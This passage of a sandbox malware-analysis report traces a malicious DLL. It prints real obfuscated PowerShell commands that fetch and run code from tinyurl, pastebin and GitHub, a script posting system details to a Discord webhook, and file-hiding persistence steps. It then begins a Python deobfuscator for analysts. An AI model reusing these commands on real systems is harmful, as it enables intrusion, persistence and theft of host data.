2024-10-15 14:00:27 UTC | 1378 | IN | Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
2024-10-15 14:00:27 UTC | 1378 | IN | Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
2024-10-15 14:00:27 UTC | 1378 | IN | Data Ascii:
cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors

# Retrieve GPU information
$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
2024-10-15 14:00:27 UTC | 618 | IN | Data Ascii:
======================
"@
} | ConvertTo-Json

# Send the POST request to the webhook URL
try {
    Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json"
    Write-Output "Message sent successfully."
} catch {
    W


Session ID:14
Source IP:192.168.2.6
Source Port:49932
Destination IP:172.67.19.24
Destination Port:443
PID:3780
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 14:00:33 UTC | 169 | OUT | GET /raw/sA04Mwk2 HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
2024-10-15 14:00:33 UTC | 397 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 15 Oct 2024 14:00:33 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: HIT
                                                            Age: 483
                                                            Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8d305608691f47a3-DFW
2024-10-15 14:00:33 UTC | 139 | IN | Data Ascii:
85
calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
2024-10-15 14:00:33 UTC | 5 | IN | Data Ascii: 0


Session ID:15
Source IP:192.168.2.6
Source Port:49944
Destination IP:185.199.109.133
Destination Port:443
PID:3780
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 14:00:34 UTC | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: raw.githubusercontent.com
                                                            Connection: Keep-Alive
2024-10-15 14:00:34 UTC | 901 | IN | HTTP/1.1 200 OK
                                                            Connection: close
                                                            Content-Length: 7508
                                                            Cache-Control: max-age=300
                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                            Content-Type: text/plain; charset=utf-8
                                                            ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                            Strict-Transport-Security: max-age=31536000
                                                            X-Content-Type-Options: nosniff
                                                            X-Frame-Options: deny
                                                            X-XSS-Protection: 1; mode=block
                                                            X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                            Accept-Ranges: bytes
                                                            Date: Tue, 15 Oct 2024 14:00:34 GMT
                                                            Via: 1.1 varnish
                                                            X-Served-By: cache-dfw-kdal2120064-DFW
                                                            X-Cache: HIT
                                                            X-Cache-Hits: 1
                                                            X-Timer: S1729000835.797408,VS0,VE3
                                                            Vary: Authorization,Accept-Encoding,Origin
                                                            Access-Control-Allow-Origin: *
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            X-Fastly-Request-ID: 142da34901229465b5af17502ae87fdc773a697c
                                                            Expires: Tue, 15 Oct 2024 14:05:34 GMT
                                                            Source-Age: 40
2024-10-15 14:00:34 UTC | 1378 | IN | Data Ascii:
sleep 5
rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Force
sleep 5


$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
if (-Not (Test-Path $googoogaagaa)) {
rm $env:tmp\onedrivefilesync.dll -force
New-ItemPropert
2024-10-15 14:00:34 UTC | 1378 | IN | Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
2024-10-15 14:00:34 UTC | 1378 | IN | Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
2024-10-15 14:00:34 UTC | 1378 | IN | Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
2024-10-15 14:00:34 UTC | 1378 | IN | Data Ascii:
cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors

# Retrieve GPU information
$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
2024-10-15 14:00:34 UTC | 618 | IN | Data Ascii:
======================
"@
} | ConvertTo-Json

# Send the POST request to the webhook URL
try {
    Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json"
    Write-Output "Message sent successfully."
} catch {
    W


Session ID:16
Source IP:192.168.2.6
Source Port:49971
Destination IP:162.159.136.232
Destination Port:443
PID:2248
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 14:00:40 UTC | 311 | OUT | POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Content-Type: application/json
                                                            Host: discord.com
                                                            Content-Length: 299
                                                            Connection: Keep-Alive
2024-10-15 14:00:40 UTC | 299 | OUT | Data Ascii:
{
    "content":  "================================\n**user** system online\n\n**GPU:** 7GOMRN\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC -
2024-10-15 14:00:41 UTC | 1253 | IN | HTTP/1.1 404 Not Found
                                                            Date: Tue, 15 Oct 2024 14:00:40 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 45
                                                            Connection: close
                                                            Cache-Control: public, max-age=3600, s-maxage=3600
                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                            x-ratelimit-limit: 5
                                                            x-ratelimit-remaining: 4
                                                            x-ratelimit-reset: 1729000842
                                                            x-ratelimit-reset-after: 1
                                                            via: 1.1 google
                                                            alt-svc: h3=":443"; ma=86400
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ykgrJhrdQAuXIF%2FQKSeE60CJ37pvq8%2Bc5vmP6qWBgJ93tUd3Qeejir6C8t2jVEUmYaLY6XNSD48senElWeEarjuzGLieg2WRFr8Fxn0KluQiH6wzX9lRMMTH0zmt"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            X-Content-Type-Options: nosniff
                                                            Set-Cookie: __cfruid=2ea9685ce586c51b0bca2e633e8796cf617bbecc-1729000840; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                            Set-Cookie: _cfuvid=eCs98e8dAlxe0U1ShJkr5nbDFUYVwumZQuMHhZ8z4IA-1729000840964-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                            Server: cloudflare
                                                            CF-RAY: 8d3056374bf86900-DFW
2024-10-15 14:00:41 UTC | 45 | IN | Data Ascii: {"message": "Unknown Webhook", "code": 10015}


Session ID:17
Source IP:192.168.2.6
Source Port:50012
Destination IP:162.159.136.232
Destination Port:443
PID:3780
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 14:00:48 UTC | 311 | OUT | POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Content-Type: application/json
                                                            Host: discord.com
                                                            Content-Length: 299
                                                            Connection: Keep-Alive
2024-10-15 14:00:48 UTC | 299 | OUT | Data Ascii:
{
    "content":  "================================\n**user** system online\n\n**GPU:** 7GOMRN\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC -
2024-10-15 14:00:48 UTC | 1263 | IN | HTTP/1.1 404 Not Found
                                                            Date: Tue, 15 Oct 2024 14:00:48 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 45
                                                            Connection: close
                                                            Cache-Control: public, max-age=3600, s-maxage=3600
                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                            x-ratelimit-limit: 5
                                                            x-ratelimit-remaining: 4
                                                            x-ratelimit-reset: 1729000849
                                                            x-ratelimit-reset-after: 1
                                                            via: 1.1 google
                                                            alt-svc: h3=":443"; ma=86400
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MpGZhnGytTbBzZ%2BcgkX91TRStmAqOqXKjT%2B4jB6yA%2BdlxoO%2B9st0%2F2KXqIql7L%2FLeppQTltStmbM3Wb2el9wWCKsucMJptU37J5gmQIGd3om9sRfkTM4G4n6YV%2F3"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            X-Content-Type-Options: nosniff
                                                            Set-Cookie: __cfruid=26fb985b43ebf471a437580369e1a2bbe44f8557-1729000848; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                            Set-Cookie: _cfuvid=L72acNRxEN0zEuoWczc9wPsvJRIRmfHA8n91nvmo6jE-1729000848317-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                            Server: cloudflare
                                                            CF-RAY: 8d305665596e4746-DFW
2024-10-15 14:00:48 UTC | 45 | IN | Data Ascii: {"message": "Unknown Webhook", "code": 10015}
                                                            Target ID:0
                                                            Start time:09:59:54
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\loaddll64.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:loaddll64.exe "C:\Users\user\Desktop\HQsitBLlOv.dll"
                                                            Imagebase:0x7ff650d90000
                                                            File size:165'888 bytes
                                                            MD5 hash:763455F9DCB24DFEECC2B9D9F8D46D52
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:1
                                                            Start time:09:59:54
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff66e660000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:2
                                                            Start time:09:59:54
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HQsitBLlOv.dll",#1
                                                            Imagebase:0x7ff7fb1b0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:3
                                                            Start time:09:59:54
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\regsvr32.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:regsvr32.exe /s C:\Users\user\Desktop\HQsitBLlOv.dll
                                                            Imagebase:0x7ff7b3930000
                                                            File size:25'088 bytes
                                                            MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:4
                                                            Start time:09:59:54
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\rundll32.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:rundll32.exe C:\Users\user\Desktop\HQsitBLlOv.dll,DllRegisterServer
                                                            Imagebase:0x7ff7f47c0000
                                                            File size:71'680 bytes
                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:09:59:54
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\rundll32.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:rundll32.exe "C:\Users\user\Desktop\HQsitBLlOv.dll",#1
                                                            Imagebase:0x7ff7f47c0000
                                                            File size:71'680 bytes
                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:6
                                                            Start time:09:59:54
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
                                                            Imagebase:0x7ff6e3d50000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:7
                                                            Start time:09:59:54
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
                                                            Imagebase:0x7ff6e3d50000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:8
                                                            Start time:09:59:54
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
                                                            Imagebase:0x7ff6e3d50000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:9
                                                            Start time:09:59:54
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff66e660000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:10
                                                            Start time:09:59:54
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff66e660000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:11
                                                            Start time:09:59:54
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff66e660000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:13
                                                            Start time:09:59:57
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
                                                            Imagebase:0x7ff6e3d50000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:18
                                                            Start time:10:00:21
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\attrib.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                            Imagebase:0x7ff6a71e0000
                                                            File size:23'040 bytes
                                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:19
                                                            Start time:10:00:21
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\attrib.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                            Imagebase:0x7ff6a71e0000
                                                            File size:23'040 bytes
                                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:20
                                                            Start time:10:00:21
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\attrib.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                            Imagebase:0x7ff6a71e0000
                                                            File size:23'040 bytes
                                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:21
                                                            Start time:10:00:22
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\forfiles.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                            Imagebase:0x7ff634000000
                                                            File size:52'224 bytes
                                                            MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:22
                                                            Start time:10:00:22
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff66e660000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:23
                                                            Start time:10:00:22
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                            Imagebase:0x7ff6e3d50000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:24
                                                            Start time:10:00:22
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                            Imagebase:0x7ff6e3d50000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:25
                                                            Start time:10:00:30
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\forfiles.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                            Imagebase:0x7ff634000000
                                                            File size:52'224 bytes
                                                            MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:26
                                                            Start time:10:00:30
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff66e660000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:27
                                                            Start time:10:00:30
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                            Imagebase:0x7ff6e3d50000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:28
                                                            Start time:10:00:30
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                            Imagebase:0x7ff6e3d50000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

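The PowerShell command lines recorded for targets 6, 7, 8, 13, 23, 24, 27 and 28 all use the same trick to keep `iex` and `Invoke-WebRequest` out of the visible command line: `sal` is the built-in alias for Set-Alias, `$env:os` expands to the literal string `Windows_NT` on every Windows host, so `sal $env:os iWr` silently defines an alias named `Windows_NT` for Invoke-WebRequest, `sal callit ('iE'+'x')` defines `callit` for Invoke-Expression, and the download URL is split into concatenated fragments (`'ti' + 'nyu' + ...`). `sal fatbake calc` is a decoy that is never used. The forfiles launches (targets 21 and 25) are proxy execution: `/p c:\windows\system32 /m notepad.exe` matches exactly one file, so the `/c` command runs once with forfiles as the parent. The following script is an added example, not part of the Joe Sandbox report, that replays the Set-Alias statements offline and rewrites the script with real cmdlet names; the sample command lines are copied from the process list above and nothing is executed or fetched. The built-in alias table and indicator names are the example's own assumptions.

```python
"""Resolve Set-Alias (sal) indirection in recorded PowerShell command lines.

Added example for this report; it does not run the samples, it only parses them.
"""
import re

# Command lines copied from the process list above (constructed sample input).
SAMPLES = [
    "powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; "
    "calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)",
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -windowstyle h '
    '-command "sal fatbake calc;sal callit iEx; sal $env:os iWr; '
    'calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"',
]

# Windows PowerShell built-in aliases that matter here (alias lookup is case-insensitive).
BUILTIN = {"iex": "Invoke-Expression", "iwr": "Invoke-WebRequest", "sal": "Set-Alias"}
# $env:OS is "Windows_NT" on every Windows host; only this variable is modelled (assumption).
ENV = {"os": "Windows_NT"}
# Hosts seen in this report; extend for your own environment (assumption).
SUSPECT_HOSTS = {"tinyurl.com", "pastebin.com"}

CONCAT = re.compile(r"\(\s*'[^']*'(?:\s*\+\s*'[^']*')+\s*\)")
SAL = re.compile(r"^sal\s+(\S+)\s+\(?'?([A-Za-z][\w-]*)'?\)?$", re.IGNORECASE)
URL = re.compile(r"(?:https?://)?([a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,})(/[^\s'\")]*)?",
                 re.IGNORECASE)


def script_body(cmdline: str) -> str:
    """Return the text handed to -command, unwrapped from its outer quotes."""
    m = re.search(r"-command\s+(.*)$", cmdline, re.IGNORECASE | re.DOTALL)
    body = (m.group(1) if m else cmdline).strip()
    if len(body) > 1 and body[0] == body[-1] and body[0] in "\"'":
        body = body[1:-1]
    return body


def fold_concat(text: str) -> str:
    """('iE'+'x') -> ('iEx'): join runs of single-quoted literals glued with +."""
    return CONCAT.sub(
        lambda m: "('" + "".join(re.findall(r"'([^']*)'", m.group(0))) + "')", text)


def resolve(cmdline: str) -> dict:
    """Replay the sal statements, then rewrite the remaining script with real cmdlet names."""
    raw = script_body(cmdline)
    body = fold_concat(raw)
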